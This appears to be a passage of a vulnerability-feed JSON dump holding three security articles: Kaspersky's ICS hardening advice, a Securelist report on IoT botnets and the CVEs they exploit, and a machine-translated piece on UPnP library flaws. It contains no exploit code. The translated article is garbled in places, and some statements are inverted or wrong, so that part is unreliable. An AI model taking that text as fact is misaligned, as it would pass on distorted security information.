(DMZ);\n * Systems in the demilitarized zone should be divided into subnets or virtual subnets (VLAN), with restricted access between subnets (only the communications that are required should be allowed);\n * All the necessary communication between the industrial network and the outside world (including the enterprise's office network) should be performed via the DMZ;\n * If necessary, terminal servers that support reverse connection methods (from the industrial network to the DMZ) can be deployed in the DMZ;\n * Thin clients should be used whenever possible to access the industrial network from the outside (using reverse connection methods);\n * Access from the demilitarized zone to the industrial network should be blocked;\n * If the enterprise's business processes are compatible with one-way communication, we recommend that you consider using data diodes.\n\nThe threat landscape for industrial automation systems is continually changing, with new vulnerabilities regularly found both in application software and in industrial software. Based on the threat evolution trends identified in H2 2017, we recommend placing special emphasis on the following security measures:\n\n * Regularly updating the operating systems, application software and security solutions on systems that are part of the enterprise's industrial network;\n * Installing firmware updates on control devices used in industrial automation systems in a timely manner;\n * Restricting network traffic on ports and protocols used on the edge routers between the organization's network and those of other companies (if information is transferred from one company's industrial network to another company);\n * An emphasis on account control and password policies is recommended. Users should have only those privileges that are required for them to perform their responsibilities. The number of user accounts with administrative privileges should be as limited as possible. Strong passwords (at least 9 characters, both upper and lower case, combined with digits and special characters) should be used, with regular password changing enforced by the domain policy, for example, every 90 days.\n\nTo provide protection from accidental infections with new, previously unknown malware and targeted attacks, we recommend doing the following on a regular basis:\n\n 1. Taking an inventory of running network services on all hosts of the industrial network; where possible, stopping vulnerable network services (unless this will jeopardize the continuity of industrial processes) and other services that are not directly required for the operation of the automation system; special emphasis should be made on services that provide remote access to file system objects, such as SMB/CIFS and/or NFS (which is relevant in the case of attacks on systems running Linux).\n 2. Auditing ICS component access control; trying to achieve maximum access granularity.\n 3. Auditing the network activity in the enterprise's industrial network and at its boundaries. Eliminate any network connections with external and other adjacent information networks that are not required by industrial processes.\n 4. Verifying the security of remote access to the industrial network; placing a special emphasis on whether demilitarized zones are set up in compliance with IT security requirements. To the fullest extent possible, minimizing or completely eliminating the use of remote administration tools (such as RDP or TeamViewer). More details on this are provided above.\n 5. Ensuring that signature databases, heuristics and decision algorithms of endpoint security solutions are up-to-date. Checking that all the main protection components are enabled and running and that ICS software folders, OS system folders or user profiles are not excluded from the scope of protection. Application startup control technologies configured in whitelisting mode and application behavior analysis technologies are particularly effective for industrial enterprises. Application startup control will prevent cryptomalware from running even if it finds its way on to the computer, while application behavior analysis technologies are helpful for detecting and blocking attempts to exploit vulnerabilities (including unknown) in legitimate software.\n 6. Auditing policies and practices related to using removable media and portable devices. Blocking devices that provide illegitimate access to external networks and the Internet from being connected to industrial network hosts. Wherever possible, disabling the relevant ports or controlling access to these ports using properly configured dedicated tools.\n\nIn addition, to provide protection from targeted attacks directed at the enterprise's industrial network and its main industrial assets, we recommend deploying tools that provide network traffic monitoring and detection of cyberattacks on industrial networks. In most cases, such measures do not require any changes to ICS components or their configuration and can be carried out without suspending their operation.\n\nOf course, completely isolating the industrial network from adjacent networks is virtually impossible, since transferring data between networks is required to perform a variety of important functions \u2013 controlling and maintaining remote facilities, coordinating sophisticated industrial processes, parts of which are distributed between numerous workshops, lines, plants and support systems. We hope, however, that our recommendations will help you provide maximum protection for your industrial networks and automation systems against existing and future threats.\n\n_**Kaspersky Lab Industrial Control Systems Cyber Emergency Response Team (Kaspersky Lab ICS CERT)** is a global project of Kaspersky Lab aimed at coordinating the work of industrial automation system vendors, owners and operators of industrial facilities and IT security researchers in addressing issues associated with protecting industrial enterprises and critical infrastructure facilities._\n\n[ **Read the full \"Threat Landscape for Industrial Automation Systems in H2 2017\" report (English, PDF)**](<https://ics-cert.kaspersky.com/media/KL_ICS_REPORT_H2-2017_FINAL_EN_22032018.pdf>)", "modified": "2018-03-26T10:00:27", "published": "2018-03-26T10:00:27", "id": "SECURELIST:D257E8B7FC070ED8409973F0F9A689E6", "href": "https://securelist.com/threat-landscape-for-industrial-automation-systems-in-h2-2017/85053/", "type": "securelist", "title": "Threat Landscape for Industrial Automation Systems in H2 2017", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-09-28T10:13:53", "bulletinFamily": "blog", "cvelist": ["CVE-2014-8361", "CVE-2017-12113", "CVE-2017-7240", "CVE-2018-1000049", "CVE-2018-10088", "CVE-2018-10561", "CVE-2018-10562", "CVE-2018-7445"], "description": "\n\nCybercriminals' interest in IoT devices continues to grow: in H1 2018 we picked up three times as many malware samples attacking smart devices as in the whole of 2017. And in 2017 there were ten times more than in 2016. That doesn't bode well for the years ahead.\n\nWe decided to study what attack vectors are deployed by cybercriminals to infect smart devices, what malware is loaded into the system, and what it means for device owners and victims of freshly armed botnets.\n\n_Number of malware samples for IoT devices in Kaspersky Lab's collection, 2016-2018._ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/09/17153718/en-iot-malware-collection.png>)\n\nOne of the most popular attack and infection vectors against devices remains cracking Telnet passwords. In Q2 2018, there were three times as many such attacks against our [honeypots](<https://encyclopedia.kaspersky.com/glossary/honeypot-glossary/>) than all other types combined.\n\n**service** | **% of attacks** \n---|--- \n**Telnet** | 75.40% \n**SSH** | 11.59% \n**other** | 13.01% \n \nWhen it came to downloading malware onto IoT devices, cybercriminals' preferred option was one of the [Mirai](<https://securelist.com/is-mirai-really-as-black-as-its-being-painted/76954/>) family (20.9%).\n\n**#** | **downloaded malware** | **% of attacks** \n---|---|--- \n**1** | Backdoor.Linux.Mirai.c | 15.97% \n**2** | Trojan-Downloader.Linux.Hajime.a | 5.89% \n**3** | Trojan-Downloader.Linux.NyaDrop.b | 3.34% \n**4** | Backdoor.Linux.Mirai.b | 2.72% \n**5** | Backdoor.Linux.Mirai.ba | 1.94% \n**6** | Trojan-Downloader.Shell.Agent.p | 0.38% \n**7** | Trojan-Downloader.Shell.Agent.as | 0.27% \n**8** | Backdoor.Linux.Mirai.n | 0.27% \n**9** | Backdoor.Linux.Gafgyt.ba | 0.24% \n**10** | Backdoor.Linux.Gafgyt.af | 0.20% \n \n_Top 10 malware downloaded onto infected IoT device following a successful Telnet password crack_\n\nAnd here are the Top 10 countries from which our traps were hit by Telnet password attacks:\n\n_Geographical distribution of the number of infected devices, Q2 2018._ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/09/17153651/en-map-infected-devices-q2-2018.png>)\n\nAs we see, in Q2 2018 the leader by number of unique IP addresses from which Telnet password attacks originated was Brazil (23%). Second place went to China (17%). Russia in our list took 4th place (7%). Overall for the period January 1 \u2013 July 2018, our Telnet honeypot registered more than 12 million attacks from 86,560 unique IP addresses, and malware was downloaded from 27,693 unique IP addresses.\n\nSince some smart device owners change the default Telnet password to one that is more complex, and many gadgets don't support this protocol at all, cybercriminals are constantly on the lookout for new ways of infection. This is stimulated by the high competition between virus writers, which has led to password bruteforce attacks becoming less effective: in the event of a successful crack, the device password is changed and access to Telnet is blocked.\n\nAn example of the use of \"alternative technology\" is the Reaper botnet, whose assets at end-2017 numbered about 2 million IoT devices. Instead of bruteforcing Telnet passwords, this botnet exploited known software vulnerabilities:\n\n * [Vulnerabilities in D-Link 850L router firmware](<https://blogs.securiteam.com/index.php/archives/3364>)\n * [Vulnerabilities in GoAhead IP cameras](<https://pierrekim.github.io/blog/2017-03-08-camera-goahead-0day.html>)\n * [Vulnerabilities in MVPower CCTV cameras](<https://www.pentestpartners.com/security-blog/pwning-cctv-cameras/>)\n * [Vulnerability in Netgear ReadyNAS Surveillance](<https://blogs.securiteam.com/index.php/archives/3409>)\n * [Vulnerability in Vacron NVR](<https://blogs.securiteam.com/index.php/archives/3445>)\n * [Vulnerability in Netgear DGN devices](<http://seclists.org/bugtraq/2013/Jun/8>)\n * [Vulnerabilities in Linksys E1500/E2500 routers](<http://www.s3cur1ty.de/m1adv2013-004>)\n * [Vulnerabilities in D-Link DIR-600 and DIR 300 - HW rev B1 routers](<http://www.s3cur1ty.de/m1adv2013-003>)\n * Vulnerabilities in AVTech devices\n\nAdvantages of this distribution method over password cracking:\n\n * Infection occurs much faster\n * It is much harder to patch a software vulnerability than change a password or disable/block the service\n\nAlthough this method is more difficult to implement, it found favor with many virus writers, and it wasn't long before new Trojans exploiting known vulnerabilities in smart device software started appearing.\n\n## New attacks, old malware\n\nTo see which vulnerabilities are targeted by malware, we analyzed data on attempts to connect to various ports on our traps. This is the picture that emerged for Q2 2018:\n\n**Service** | **Port** | **% of attacks** | **Attack vector** | **Malware families** \n---|---|---|---|--- \n**Telnet** | 23, 2323 | 82.26% | Bruteforce | Mirai, Gafgyt \n**SSH** | 22 | 11.51% | Bruteforce | Mirai, Gafgyt \n**Samba** | 445 | 2.78% | EternalBlue, EternalRed, CVE-2018-7445 | - \n**tr-069** | 7547 | 0.77% | [RCE in TR-069 implementation](<https://isc.sans.edu/forums/diary/TR069+NewNTPServer+Exploits+What+we+know+so+far/21763/>) | Mirai, Hajime \n**HTTP** | 80 | 0.76% | Attempts to exploit vulnerabilities in a web server or crack an admin console password | - \n**winbox (RouterOS)** | 8291 | 0.71% | [Used for RouterOS (MikroTik) authentication](<https://xakep.ru/2018/03/29/hajime-hunts-mikrotik/>) and [WinBox-based attacks](<https://threatpost.ru/mikrotik-patched-zero-day-vulnerability-in-record-time/25811/>) | Hajime \n**Mikrotik http** | 8080 | 0.23% | RCE in MikroTik RouterOS < 6.38.5 [Chimay-Red](<https://github.com/BigNerd95/Chimay-Red>) | Hajime \n**MSSQL** | 1433 | 0.21% | Execution of arbitrary code for certain versions (2000, 2005, 2008); changing administrator password; data theft | - \n**GoAhead httpd** | 81 | 0.16% | [RCE in GoAhead IP cameras](<http://blog.netlab.360.com/a-new-threat-an-iot-botnet-scanning-internet-on-port-81-en/>) | Persirai, Gafgyt \n**Mikrotik http** | 8081 | 0.15% | [Chimay-Red](<https://github.com/BigNerd95/Chimay-Red>) | Hajime \n**Etherium JSON-RPC** | 8545 | 0.15% | [Authorization bypass (CVE-2017-12113)](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2017-0465>) | - \n**RDP** | 3389 | 0.12% | Bruteforce | - \n**XionMai uc-httpd** | 8000 | 0.09% | [Buffer overflow (CVE-2018-10088) in XionMai uc-httpd 1.0.0 (some Chinese-made devices)](<https://www.bleepingcomputer.com/news/security/all-that-port-8000-traffic-this-week-yeah-thats-satori-looking-for-new-bots/>) | Satori \n**MySQL** | 3306 | 0.08% | Execution of arbitrary code for certain versions (2000, 2005, 2008); changing administrator password; data theft | - \n \nThe vast majority of attacks still come from Telnet and SSH password bruteforcing. The third most common are attacks against the SMB service, which provides remote access to files. We haven't seen IoT malware attacking this service yet. However, some versions of it contain serious known vulnerabilities such as EternalBlue (Windows) and EternalRed (Linux), which were used, for instance, to distribute the infamous Trojan ransomware [WannaCry](<https://securelist.com/wannacry-ransomware-used-in-widespread-attacks-all-over-the-world/78351/>) and the Monero cryptocurrency miner [EternalMiner](<https://securelist.com/sambacry-is-coming/78674/>).\n\nHere's the breakdown of possible infected IoT devices that replies on the IPs that attacked our honeypots in Q2 2018:\n\nDevice | **% of infected devices** \n---|--- \n**MikroTik** | 37.23% \n**TP-Link** | 9.07% \n**SonicWall** | 3.74% \n**AV tech** | 3.17% \n**Vigor** | 3.15% \n**Ubiquiti** | 2.80% \n**D-Link** | 2.49% \n**Cisco** | 1.40% \n**AirTies** | 1.25% \n**Cyberoam** | 1.13% \n**HikVision** | 1.11% \n**ZTE** | 0.88% \n**Unspecified device** | 0.68% \n**Unknown DVR** | 31.91% \n| \n \nAs can be seen, MikroTik devices running under RouterOS are way out in front. The reason appears to be the Chimay-Red vulnerability. ~~What's interesting is that our honeypot attackers included 33 Miele dishwashers (0.68% of the total number of attacks). Most likely they were infected through the known (since March 2017) [CVE-2017-7240](<https://nvd.nist.gov/vuln/detail/CVE-2017-7240>) vulnerability in PST10 WebServer, which is used in their firmware.~~1\n\n### Port 7547\n\nAttacks against remote device management ([TR-069](<https://en.wikipedia.org/wiki/TR-069>) specification) on port 7547 are highly common. According to Shodan, there are more than 40 million devices in the world with this port open. And that's despite the vulnerability recently causing the infection of a million Deutsche Telekom routers, not to mention helping to spread the Mirai and Hajime malware families.\n\nAnother type of attack exploits the [Chimay-Red vulnerability](<https://wikileaks.org/ciav7p1/cms/page_16384604.html>) in MikroTik routers running under RouterOS versions below 6.38.4. In March 2018, it played an active part in distributing Hajime.\n\n### IP cameras\n\nIP cameras are also on the cybercriminal radar. In March 2017, several major vulnerabilities were detected in the software of GoAhead devices, and a month after information about it was published, there appeared new versions of the Gafgyt and Persirai Trojans exploiting these vulnerabilities. Just one week after these malicious programs were actively distributed, the number of infected devices climbed to 57,000.\n\nOn June 8, 2018, a [proof-of-concept](<https://encyclopedia.kaspersky.com/glossary/poc-proof-of-concept/>) was published for the CVE-2018-10088 vulnerability in the XionMai uc-httpd web server, used in some Chinese-made smart devices (for example, KKMoon DVRs). The next day, the number of logged attempts to locate devices using this web server more than tripled. The culprit for this spike in activity was the Satori Trojan, known for previously attacking [GPON routers](<http://blog.netlab.360.com/gpon-exploit-in-the-wild-ii-satori-botnet-en/>).\n\n## New malware and threats to end users\n\n### DDoS attacks\n\nAs before, the primary purpose of IoT malware deployment is to perpetrate DDoS attacks. Infected smart devices become part of a botnet that attacks a specific address on command, depriving the host of the ability to correctly handle requests from real users. Such attacks are still deployed by Trojans from the Mirai family and its clones, in particular, Hajime.\n\nThis is perhaps the least harmful scenario for the end user. The worst (and very unlikely) thing that can happen to the owner of the infected device is being blocked by their ISP. And the device can often by \"cured\" with a simple reboot.\n\n### Cryptocurrency mining\n\nAnother type of payload is linked to cryptocurrencies. For instance, IoT malware can install a miner on an infected device. But given the low processing power of smart devices, the feasibility of such attacks remains in doubt, even despite their potentially large number.\n\nA more devious and doable method of getting a couple of cryptocoins was invented by the creators of the Satori Trojan. Here, the victim IoT device acts as a kind of key that opens access to a high-performance PC:\n\n * At the first stage, the attackers try to infect as many routers as possible using known vulnerabilities, in particular: \n * [CVE-2014-8361](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8361>) \u2013 RCE in the miniigd SOAP service in Realtek SDK\n * [CVE 2017-17215](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE%202017-17215>) \u2013 RCE in the firmware of Huawei HG532 routers\n * [CVE-2018-10561](<https://nvd.nist.gov/vuln/detail/CVE-2018-10561>), [CVE-2018-10562](<https://nvd.nist.gov/vuln/detail/CVE-2018-10562>) \u2013 authorization bypass and execution of arbitrary commands on Dasan GPON routers\n * [CVE-2018-10088](<https://nvd.nist.gov/vuln/detail/CVE-2018-10088>) \u2013 buffer overflow in XiongMai uc-httpd 1.0.0 used in the firmware of some routers and other smart devices made by some Chinese manufacturers\n * Using compromised routers and the [CVE-2018-1000049](<https://reversebrain.github.io/2018/02/01/Claymore-Dual-Miner-Remote-Code-Execution/>) vulnerability in the [Claymore](<https://www.dualminer.ru/>) Etherium miner remote management tool, they substitute the wallet address for their own.\n\n### Data theft\n\nThe [VPNFilter](<https://securelist.com/vpnfilter-exif-to-c2-mechanism-analysed/85721/>) Trojan, detected in May 2018, pursues other goals, above all intercepting infected device traffic, extracting important data from it (user names, passwords, etc.), and sending it to the cybercriminals' server. Here are the main features of VPNFilter:\n\n * Modular architecture. The malware creators can fit it out with new functions on the fly. For instance, in early June 2018 a new module was detected able to inject javascript code into intercepted web pages.\n * Reboot resistant. The Trojan writes itself to the standard Linux crontab job scheduler, and can also modify the configuration settings in the non-volatile memory (NVRAM) of the device.\n * Uses TOR for communication with C&C.\n * Able to self-destruct and disable the device. On receiving the command, the Trojan deletes itself, overwrites the critical part of the firmware with garbage data, and then reboots the device.\n\nThe Trojan's distribution method is still unknown: its code contains no self-propagation mechanisms. However, we are inclined to believe that it exploits known vulnerabilities in device software for infection purposes.\n\nThe very [first VPNFilter report](<https://blog.talosintelligence.com/2018/05/VPNFilter.html>) spoke of around 500,000 infected devices. Since then, even more have appeared, and the list of manufacturers of vulnerable gadgets has expanded considerably. As of mid-June, it included the following brands:\n\n * ASUS\n * D-Link\n * Huawei\n * Linksys\n * MikroTik\n * Netgear\n * QNAP\n * TP-Link\n * Ubiquiti\n * Upvel\n * ZTE\n\nThe situation is made worse by the fact that these manufacturers' devices are used not only in corporate networks, but often as home routers.\n\n### Conclusion\n\nSmart devices are on the rise, with [some forecasts](<https://www.statista.com/statistics/764026/number-of-iot-devices-in-use-worldwide/>) suggesting that by 2020 their number will exceed the world's population several times over. Yet manufacturers still don't prioritize security: there are no reminders to change the default password during initial setup or notifications about the release of new firmware versions, and the updating process itself can be complex for the average user. This makes IoT devices a prime target for cybercriminals. Easier to infect than PCs, they often play an important role in the home infrastructure: some manage Internet traffic, others shoot video footage, still others control domestic devices (for example, air conditioning).\n\nMalware for smart devices is increasing not only in quantity, but also quality. More and more exploits are being weaponized by cybercriminals, and infected devices are used to steal personal data and mine cryptocurrencies, on top of traditional DDoS attacks.\n\nHere are some simple tips to help minimize the risk of smart device infection:\n\n * Don't give access to the device from an external network unless absolutely necessary\n * Periodic rebooting will help get rid of malware already installed (although in most cases the risk of reinfection will remain)\n * Regularly check for new firmware versions and update the device\n * Use complex passwords at least 8 characters long, including upper and lower-case letters, numerals, and special characters\n * Change the factory passwords at initial setup (even if the device does not prompt you to do so)\n * Close/block unused ports, if there is such an option. For example, if you don't connect to the router via Telnet (port TCP:23), it's a good idea to disable it so as to close off a potential loophole to intruders.\n\n \n\n* * *\n\n1 \u2014 The previous version of the text incorrectly stated that Kaspersky Lab honeypots, used for detecting botnets, were attacked by 33 Miele dishwashers.\n\nA Miele representative shared new details with us so we could review our earlier findings. \n\nWe understand that connection attempts were performed by other objects from the networks that presented the targeted IP-addresses \u2013 including, but not limited to, a router or another device within the network.\n\nWe would like to thank the company for bringing this to our attention and being able to clarify our findings. We apologize for any confusion caused.", "modified": "2018-09-18T10:00:36", "published": "2018-09-18T10:00:36", "id": "SECURELIST:2F75371B5752C888430A598DF749FD1A", "href": "https://securelist.com/new-trends-in-the-world-of-iot-threats/87991/", "type": "securelist", "title": "New trends in the world of IoT threats", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "myhack58": [{"lastseen": "2019-03-28T22:38:03", "bulletinFamily": "info", "cvelist": ["CVE-2013-0229", "CVE-2013-0230", "CVE-2007-1204", "CVE-2017-1000494", "CVE-2012-5958", "CVE-2014-8361"], "description": "Earlier this year, Chromecast streaming dongle, Google Home devices and smart TV users are forced to harvest a strip from the youtube PewDiePie channel promotion information. This hijacking is said by the tube top traffic UP the main are a fan of the battle for the thrown. Reported that hackers exploit the improperly configured router, these routers enable the universal plug and play(Universal Plug \u2013 and \u2013 Play, abbreviated UPnP)service, resulting in the router the public port to the private device and the public Internet open. \nMany devices such as cameras, printers and routers, use the UPnP Protocol, so that it can automatically find and check local other devices on the network, and can communicate with each other to share data or stream media. But it brings convenience, but also brings security risks, such as from attacker-controlled devices to bypass the firewall protection, etc., to name a few. \nIn the above event, we investigated a home network with UPnP-related events, found that many users of the device still using the UPnP Protocol. \n\n! [](/Article/UploadPic/2019-3/20193292294895.jpg) \nTable 1. Enabled UPnP for major equipment types \nThis year 1 month, we detected 76 per cent of the router to enable the UPnP Protocol, and 27% of media equipment such as DVD player and media streaming device is also enabled UPnP. Once the UPnP vulnerability be exploited by attackers, a router or other device easily becomes the agent, and then become confused botnets, distributed denial of service attacks([DDoS](<http://www.myhack58.com/Article/60/sort096/Article_096_1.htm>))or spam campaigns the source, and let people almost can't track malicious activity implementation. Previously there have been such cases, the use of a router UPnP Protocol vulnerabilities so that it is forced to connect to Port, send spam or other malicious messages. \nIoT botnet Satori was due to the use of the UPnP vulnerabilities and the infamous. The vulnerability, CVE-2014-8361 is a Realtek SDK miniigd UPnP SOAP interface command injection vulnerability. 2015 5 months, and this vulnerability is related to the announcement and provided the appropriate mitigation measures, but according to our collection of the latest data, many devices are still using older, possibly vulnerable UPnP version. \n\n! [](/Article/UploadPic/2019-3/20193292295992. png) \nFigure 1. Shodan for UPnP detection of the relevant results of the 2019 \u5e74 3 \u6708 5 data \nOnline search engine Shodan can be presented worldwide using the UPnP Protocol, the device number and distribution. In the scan UPnP uses the standard port 1900, we retrieved the 1,649,719. The following table lists some of the well-known UPnP libraries, MiniUPnPd and Custom\uff08Broadcom UPnP library is the most search equipment used. \n! [](/Article/UploadPic/2019-3/20193292297936.jpg) \nTable 2. Shodan display the results in the first three UPnP library 2019 3 month 5 day data \nUPnP related vulnerabilities and the home network device status \nThrough our own Scan tool, we studied the family and other small-scale network environment using UPnP library, and to determine the possible cause the device to the vulnerable factors. In short, we found that most devices still use the older version of the UPnP library, and these UPnP library in the presence of many vulnerabilities have been published for many years. \nMiniUPnPd \nOur IOT scan tool data display, enable UPnP devices 16% use a MiniUPnPd library. MiniUPnPd is a well-known UPnP daemon for NAT\uff08Network Address Translation a router providing port mapping Protocol services. Interestingly, we detected installed older versions of MiniUPnPd device, with 24%in the use MiniUPnPd 1.0, 30% in the use MiniUPnPd 1.6, only 5%of the equipment used MiniUPnPd 2. x version(miniupnpd 2.1 is the latest version). \n! [](/Article/UploadPic/2019-3/20193292298107.jpg) \nTable 3. MiniUPnPd each version using the ratio of \nHaving the older version of Daemon equipment must be updated, in order to put an end to some of the known high-risk vulnerabilities. For example, CVE-2013-0230 is the MiniUPnPd version 1.0 of the ExecuteSoapAction in a stack-based buffer overflow vulnerability that allows an attacker to execute arbitrary code; CVE-2013-0229 is MiniUPnPd 1.4 before a ProcessSSDPRequest a function of the vulnerability, which allows an attacker through a request to trigger a buffer over-read to cause a denial of Service(DoS); the CVE-2017-1000494 is MiniUPnPd version 2.0 prior to an uninitialized stack variable vulnerability, which allows attackers to initiate a DoS attack(segmentation fault and memory damage). \nWindows UPnP server \nWe also found that 18% of the devices using a Windows-based UPnP. These devices, especially the Microsoft Windows XP computer, Windows NT 5.1, you should check whether you have applied MS07-019 patch. (But Windows XP in 2014 4 months have come to an end, which means that it is no longer under Microsoft support, security issues will also be resolved.) Windows XP comes with UPnP functionality is available out of the box, and the patch can solve the UPnP memory corruption vulnerability CVE-2007-1204, and this vulnerability allows a remote attacker on the local service account context to run arbitrary code. \nLibupnp is used in UPnP device of the portable SDK \nFor the UPnP Device SDK portable software development kit libupnp is another well-known UPnP library, it can support a variety of[OS](<http://www.myhack58.com/Article/48/Article_048_1.htm>a). According to our data, the detection device there is a 5% in the use of the libupnp library package, although not a large proportion, but we note that having the library's equipment is mostly 1. 6. 18 / 1.6.19 version before the current version is 1. 8. 4 in. And in 1. 6. 18 a previous version, unique_service_name function in the presence of a stack-based buffer overflow vulnerability, CVE-2012-5958, which allows remote attack via the User Datagram Protocol\uff08UDP data packet to execute arbitrary code. \nConclusions \nFor the user, to determine whether the device has the UPnP related vulnerabilities or whether they are infection is very tricky. Some devices may be hidden in the behind a NAT, so that even if the vulnerability exists, the user will not immediately see the risk. In order to prevent the use of UPnP related vulnerabilities, users should ensure that their device updates. If you suspect the device is infected, you should restart the device, reset it to original factory settings, or to prudence, which was all replaced. Unless network need the device enabled UPnP function, otherwise the best in the device allows the case of the disabled. However, it is noted that, turn off UPnP might also be associated disable some of the features, including the local device dependency, or the need to ignore a request from the device to. \nHome users can also follow these measures to increase security: \n1, use the trend of the home network HouseCal tool scans the home network, and check which devices UPnP port 1900 is open. \n2, go to the device setup page for example the router's settings page to disable UPnP. \n3, according to the need to manually configure port forwarding settings. \n\n", "edition": 1, "modified": "2019-03-29T00:00:00", "published": "2019-03-29T00:00:00", "id": "MYHACK58:62201993392", "href": "http://www.myhack58.com/Article/html/3/62/2019/93392.htm", "title": "Next from the printer coming out will be?-- The theory of the UPnP using the status quo and risk-vulnerability warning-the black bar safety net", "type": "myhack58", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}